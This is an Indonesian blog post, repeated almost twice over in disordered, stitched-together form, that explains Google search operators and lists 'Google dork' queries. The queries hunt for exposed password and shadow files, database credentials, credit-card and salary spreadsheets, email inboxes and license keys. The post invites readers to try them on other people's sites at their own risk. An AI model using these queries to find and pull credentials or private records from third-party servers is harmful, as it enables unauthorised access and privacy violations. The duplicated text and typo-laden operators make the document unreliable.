“filetype:doc site:go.id confidental” (   tanpa tanda kutip). Pencarian akan menghasilkan file data dengan   ekstensi “.doc” pada semua domain go.id yang berisi informasi   “confidential”.

“link:” ialah sintaks perintah pada   Google yang akan menunjukkan daftar list webpages yang memiliki link   pada webpage special. Sebagai contoh:“link:www.securityfocus.com” akan   menunjuukan daftar webpage yang memiliki point link pada page   SecurityFocus.

“related:” sintaks ini akan memberikan   daftar web pages yang serupa dengan web page yang di indikasikan.   Sebagai contoh: “related:www.securityfocus.com”, pencarian akan memberi   daftar web page yang serupa dengan homepage Securityfocus.

“intext:”   sintaks perintah ini akan mencari kata kata pada website tertentu.   Perintah ini mengabaikan link atau URL dan judul halaman. Sebagai contoh   :“intext:admin” (tanpa tanda petik), pencarian akan menghasilkan link   pada web page yang memiliki keyword yang memiliki keyword admin.

Pada   kesempatan ini dipaparkan bagaimana penggunaan sintaks “index of”  untuk  mendapatkan hubungan pada webserver dengan direktori indeks  browsing  yang dapat diakses.. Hal tersebut merupakan sumber informasi  yang  sederhana dapat diperoleh, akan tetapi isi dari informasi  seringkali  merupakan informasi yang sangat penting. Informasi tersebut  dapat saja  berupa password akses atau data transaksi online dan hal  yang sangat  penting lainnya. Dibawah ini merupakan beberapa contoh  penggunaan  sintaks “ indeks of” untuk mendapatkan informasi yang  penting dan  sensitive sifatnya.

ex :
Index of /admin
Index of /passwd
Index of /password
Index of /mail
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
"Index of /secret"
"Index of /confidential"
"Index of /root"
"Index of /cgi-bin"
"Index of /credit-card"
"Index of /logs"
"Index of /config"
"Index of /admin.asp"
"Index of /login.asp"

Sintaks “inurl:” atau “allinurl:” dapat dikombinasikan dengan sintaks yang lainnya seperti pada daftar dibawah ini :

inurl: /cgi-bin/cart32.exe
inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurl:orders.txt
inurl:"wwwroot/*."
inurl:adpassword.txt
inurl:webeditor.php
inurl:file_upload.php
inurl:gov filetype:xls "restricted"
index of ftp +.mdb allinurl:/cgi-bin/ +mailto allinurl:/scripts/cart32.exe
llinurl:/CuteNews/show_archives.php
allinurl:/phpinfo.php
allinurl:/privmsg.php
allinurl:/privmsg.php
inurl:cgi-bin/go.cgi?go=*
allinurl:.cgi?page=*.txt
allinurul:/modules/My_eGallery

Penggunaan lain dari sintaks “intitle:” atau “allintitle:” yang dikombinasikan dengan sintaks lainnya antara lain :

intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
ntitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
allintitle:*.php?filename=*
allintitle:*.php?page=*
allintitle:*.php?logon=*

Dibawah ini ada beberapa contoh kasus:
(silahkan mencoba...segala resiko berkenaan dengan security website yang dituju...merupakan tanggung jawab masing-masing)

Operator dasar

+, -, ~ , ., *, “”, |, OR

Operator tambahan

allintext:,   allintitle:, allinurl:, bphonebook:, cache:, define:, filetype:,  info:,  intext:, intitle:, inurl:, link:, phonebook:, related:,  rphonebook:,  site:, numrange:, daterange

Extensi yang dapat dicari:
HyperText Markup Language (html)
Microsoft PowerPoint (ppt)
Adobe Portable Document Format (pdf)
Microsoft Word (doc)
Adobe PostScript (ps)
Microsoft Works (wks, wps, wdb)
Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
Microsoft Excel (xls)
Microsoft Write (wri)
Lotus WordPro (lwp)
Rich Text Format (rtf)
MacWrite (mw)
Shockwave Flash (swf)
Text (ans, txt)

Pencarian berdasarkan range
komputer Rp5000000..7000000

Pencarian gaji
Salary filetype: xls site: edu
Salary filetype: xls site: edu

Informasi financial
Filetype: xls “checking account” “credit card” -intext: Application -intext: Form
Intitle: “Index of” finances.xls

Mencari inbox e-mail
Intitle: Index.of inurl: Inbox (456) (mit mailbox)
Intitle: Index.of inurl: Inbox (inurl: User OR inurl: Mail) (220)

Mendeteksi OS
"Microsoft-IIS/5.0 server at”
Intitle: “Welcome to Windows 2000 Internet Services” IIS 5.0
Intitle: Test.Page.for.Apache seeing.this.instead
Intitle: Test.page “SSL/TLS-aware”

Mencari password
Inurl: etc inurl: passwd
Intitle: “Index of..etc” passwd
"# -FrontPage-" inurl: service.pwd
Inurl: admin.pwd filetype: pwd
Filetype: inc dbconn
Filetype: inc intext: mysql_connect
Filetype: ini +ws_ftp +pwd
Filetype: log inurl: “password.log”

Mencari User Name
+intext: "webalizer" +intext: “Total Usernames” +intext: “Usage Statistics for”

Mencari License Key

Filetype: lic lic intext: key
Sensitve Directories Listing
Intitle: “Index of” cfide
Intitle: index.of.winnt
Intitle: “index of” iissamples
Pertama, Anda bisa mencari dari :
1. Iklan Google yang ada di semua situs, hasilnya akan sama saja.
2. Tombol Google search yang ada di toolbar.
3. Google main search Engine : http://www.google.com

Selanjutnya agar pencarian bisa paling mendekati keinginan Anda, ikuti tips berikut :

Dibawah   ini akan dijelaskan tentang perintah khusus pada Google, dan akan   dijelaskan pengertian dan penggunaan dari tiap – tiap perintah untuk   mendapatkan informasi tersembunyi dan sangat penting.

"Intitle:"   ialah sintaks perintah untuk membatasi pencarian yang hanya   menghasilkan judul yang mengandung informasi pada topik yangdimaksud.   Sebagai contoh pada pencarian, “intitle:password admin “ ( tanpa tanda   kutip ). Pencarian akan mencari page yang mengandung kata “ password “   sebagai judulnya dengan prioritas utama “admin” .Jika pada pencarian   terdapat dua query pencarian utama, digunakan sintaks allintitle: untuk   pencarian secara lengkap. Sebagai contoh pada pencarian   “allintitle:admin mdb”. Maka pencarian akan dibatasi pada dua subjek   utama judul yaitu “admin” dan “mdb”.
“inurl:” ialah sintaks   perintah untuk membatasi pencarian yang hanya menghasilkan semua URL   yang hanya berisi kata kunci informasi yang dimaksudkan. Sebagai contoh   pencarian dalam pencarian,”inurl : database mdb”. Pencarian akan   menghasilkan semua URL yang hanya mengandung informasi tentang “database   mdb “.
Hal yang sama juga berlaku pada sintaks ini,  jika  terdapat dua query pencarian utama, digunakan sintaks “allinurl:”  untuk  mendapatkan list url tersebut. Sebagai contoh pencarian  “allinurl:  etc/passwd“ , pencarian akan menghasilkan URL yang  mengandung informasi  tentang “etc” dan “passwd”. Tanda garis miring  slash (“/”) diantara dua  kata etc dan passwd akan diabaikan oleh mesin  pencari Google.

>“site:”  ialah sintaks perintah untuk  membatasi pencarian suatu query informasi  berdasarkan pada suatu situs  atau domain tertentu. Sebagai contoh pada  pencarian informasi:  “waveguide site:itb.ac.id” (tanpa tanda kutip).  Pencarian akan mencari  topic tentang waveguide pada semua halaman yang  tersedia pada domain  itb.ac.id.

“cache:” akan menunjukkan daftar web yang telah masuk kedalam indeks database Google.
Sebagai contoh:

“cache:deffcon.org”, pencarian akan memperlihatkan list yang disimpan pada Google untuk page deffcon.org

“filetype:”   ialah sintaks perintah pada Google untuk pencarian data pada internet   dengan ekstensi tertentu (i.e. doc, pdf or ppt etc). Sebagai contoh  pada  pencarian :

“filetype:doc site:go.id confidental” (   tanpa tanda kutip). Pencarian akan menghasilkan file data dengan   ekstensi “.doc” pada semua domain go.id yang berisi informasi   “confidential”.

“link:” ialah sintaks perintah pada   Google yang akan menunjukkan daftar list webpages yang memiliki link   pada webpage special. Sebagai contoh:“link:www.securityfocus.com” akan   menunjuukan daftar webpage yang memiliki point link pada page   SecurityFocus.

“related:” sintaks ini akan memberikan   daftar web pages yang serupa dengan web page yang di indikasikan.   Sebagai contoh: “related:www.securityfocus.com”, pencarian akan memberi   daftar web page yang serupa dengan homepage Securityfocus.

“intext:”   sintaks perintah ini akan mencari kata kata pada website tertentu.   Perintah ini mengabaikan link atau URL dan judul halaman. Sebagai contoh   :“intext:admin” (tanpa tanda petik), pencarian akan menghasilkan link   pada web page yang memiliki keyword yang memiliki keyword admin.

Pada   kesempatan ini dipaparkan bagaimana penggunaan sintaks “index of”  untuk  mendapatkan hubungan pada webserver dengan direktori indeks  browsing  yang dapat diakses.. Hal tersebut merupakan sumber informasi  yang  sederhana dapat diperoleh, akan tetapi isi dari informasi  seringkali  merupakan informasi yang sangat penting. Informasi tersebut  dapat saja  berupa password akses atau data transaksi online dan hal  yang sangat  penting lainnya. Dibawah ini merupakan beberapa contoh  penggunaan  sintaks “ indeks of” untuk mendapatkan informasi yang  penting dan  sensitive sifatnya.

ex :

Index of /admin
Index of /passwd
Index of /password
Index of /mail
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
"Index of /secret"
"Index of /confidential"
"Index of /root"
"Index of /cgi-bin"
"Index of /credit-card"
"Index of /logs"
"Index of /config"
"Index of /admin.asp"
"Index of /login.asp"

Sintaks “inurl:” atau “allinurl:” dapat dikombinasikan dengan sintaks yang lainnya seperti pada daftar dibawah ini :

inurl: /cgi-bin/cart32.exe
inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurl:orders.txt
inurl:"wwwroot/*."
inurl:adpassword.txt
inurl:webeditor.php
inurl:file_upload.php
inurl:gov filetype:xls "restricted"
index of ftp +.mdb allinurl:/cgi-bin/ +mailto allinurl:/scripts/cart32.exe
llinurl:/CuteNews/show_archives.php
allinurl:/phpinfo.php
allinurl:/privmsg.php
allinurl:/privmsg.php
inurl:cgi-bin/go.cgi?go=*
allinurl:.cgi?page=*.txt
allinurul:/modules/My_eGallery

Penggunaan lain dari sintaks “intitle:” atau “allintitle:” yang dikombinasikan dengan sintaks lainnya antara lain :

intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
ntitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
allintitle:*.php?filename=*
allintitle:*.php?page=*
allintitle:*.php?logon=*

Dibawah ini ada beberapa contoh kasus:
(silahkan mencoba...segala resiko berkenaan dengan security website yang dituju...merupakan tanggung jawab masing-masing)


Operator dasar


+, -, ~ , ., *, “”, |, OR

Operator tambahan

allintext:,   allintitle:, allinurl:, bphonebook:, cache:, define:, filetype:,  info:,  intext:, intitle:, inurl:, link:, phonebook:, related:,  rphonebook:,  site:, numrange:, daterange

Extensi yang dapat dicari:
HyperText Markup Language (html)
Microsoft PowerPoint (ppt)
Adobe Portable Document Format (pdf)
Microsoft Word (doc)
Adobe PostScript (ps)
Microsoft Works (wks, wps, wdb)
Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
Microsoft Excel (xls)
Microsoft Write (wri)
Lotus WordPro (lwp)
Rich Text Format (rtf)
MacWrite (mw)
Shockwave Flash (swf)
Text (ans, txt)

Pencarian berdasarkan range
komputer Rp5000000..7000000


Pencarian gaji
Salary filetype: xls site: edu
Salary filetype: xls site: edu

Informasi financial
Filetype: xls “checking account” “credit card” -intext: Application -intext: Form
Intitle: “Index of” finances.xls

Mencari inbox e-mail
Intitle: Index.of inurl: Inbox (456) (mit mailbox)
Intitle: Index.of inurl: Inbox (inurl: User OR inurl: Mail) (220)

Mendeteksi OS
"Microsoft-IIS/5.0 server at”
Intitle: “Welcome to Windows 2000 Internet Services” IIS 5.0
Intitle: Test.Page.for.Apache seeing.this.instead
Intitle: Test.page “SSL/TLS-aware”

Mencari password
Inurl: etc inurl: passwd
Intitle: “Index of..etc” passwd
"# -FrontPage-" inurl: service.pwd
Inurl: admin.pwd filetype: pwd
Filetype: inc dbconn
Filetype: inc intext: mysql_connect
Filetype: ini +ws_ftp +pwd
Filetype: log inurl: “password.log”

Mencari User Name
+intext: "webalizer" +intext: “Total Usernames” +intext: “Usage Statistics for”

Mencari License Key
Filetype: lic lic intext: key

Sensitve Directories Listing
Intitle: “Index of” cfide
Intitle: index.of.winnt
Intitle: “index of” iissamples

saya hanya Manusia Biasa yang sedang belajar, yuk kita belajar bareng" di fans page çýßèrßìñtåüñå - ìñfõ ßlõg
Read More --►